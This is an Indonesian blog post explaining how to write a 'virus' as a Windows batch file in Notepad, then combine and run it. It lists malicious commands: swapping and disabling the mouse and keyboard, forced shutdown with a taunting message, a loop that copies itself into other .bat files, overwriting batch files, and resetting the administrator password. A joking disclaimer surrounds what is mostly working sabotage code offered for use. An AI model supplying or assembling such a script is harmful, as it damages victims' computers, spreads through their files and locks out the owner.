facebook likes google exchange

Rabu, 28 Desember 2011

Virus Maker Notepad


Hallo sahabat blogger kali ini saya akan membahasa tentang bagai mana cara membuat virus menggunakan notepad yang kita tau notepad adalah aplikasi yang sering kita anggap memiliki fungsi yang biasa kalau bukan untuk simpan catatan ya untuk simpan data-data email.hhe.

Nach maka dari itu saya akan membuat note tersebut menjadi aplikasi yang mematikan pada komputer anda GAK PERCAYA ?
silahkan coba sendiri setelah anda membaca postingan ini tapi jangan salahin saya ya. ^_^
Berikut caranya.
Buka Notepada kalian semua.
Copykan script berikut pada notepad kalian semua.

1.Invisible command :
Script : @echo off

2.Swap mouse :
Script : :rundll32 user,swapmousebutton

3.Buka URL yg diinginkan :
Script : :start http://www.kantorku-net.blogspot.com

4.Shutdown kmptr & beri pesan :
Script : :shutdown -s -t 10 -c "YOU LOSER" -f

5.Disable mouse stlh Restart :
Script : :rundll32 mouse,disable

6.Disable keyboard stlh Restart :
Script : :rundll32 keyboard,disable

7.Freezes kmptr stlh Restart :
Script : :rundll32 user,disableoemlayer

8.Memperbanyak diri didlm direktori :
Script : :for %%i in (*.bat) do copy %0+%%i %%i /y >nul"

9.Me-replace file batch yg lain :
Script : :%0 >>other.bat

10.Mengirim dftar file dlm direktori :
Script : :dir *.*>>Filelist.txt

11.Ganti password admin :
Script : :net user administrator PASSWORD HERE


Untuk mendapatkan hasil akhir yang maksimal silahkan anda gabung semua script menjadi satu pada notepad anda lalu anda simpan dengan format .Bat dan save as type menjadi All Files

Perhatian :
Tidak di sarankan menggunakan pada PC anda sendiri dan bila ada kerusakan yang di akibatkan oleh anda sendiri saya tidak bertanggung jawab.
Kan saya cuman kasih informasi bukan untuk di coba-coba.
Untuk PC sendiri kok di coba-coba apa kata dunia.hahahah.

Sekian penulisan saya.
Gunakan sebijak mungkin

Salam Blogger.
Bayu Anugrah


0 komentar:

Posting Komentar